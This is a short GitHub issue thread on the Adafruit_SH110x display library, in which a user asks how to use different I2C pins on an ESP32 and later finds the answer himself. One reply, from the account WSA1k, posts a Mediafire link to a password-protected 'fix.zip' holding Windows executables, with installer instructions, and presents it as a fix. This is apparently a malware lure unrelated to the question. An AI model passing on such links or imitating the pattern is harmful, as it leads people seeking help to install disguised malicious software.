adafruit/Adafruit_SH110x #24: Setup different I2C Pins

giddel, 2024-08-26:
Hi,
I want to use the lib on a ESP32. But the default I2C Pins are already in use.
Is there a possibility to set different pins for SDA / SCL in in using this library?

Thanks for help!

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

giddel, 2024-08-26:
```
$ unzip fix.zip 
Archive:  fix.zip
   skipping: libssp-0.dll            unsupported compression method 99
   skipping: x86_64-w64-ranlib.exe   unsupported compression method 99
 ```
 ... and I'm using Linux ...

giddel, 2024-08-26:
Got it.
I can provide the pins at init via: 
`//U8G2_SH1106_128X64_NONAME_F_HW_I2C(rotation, [reset [, clock, data]]) [full framebuffer, size = 1024 bytes] `

/close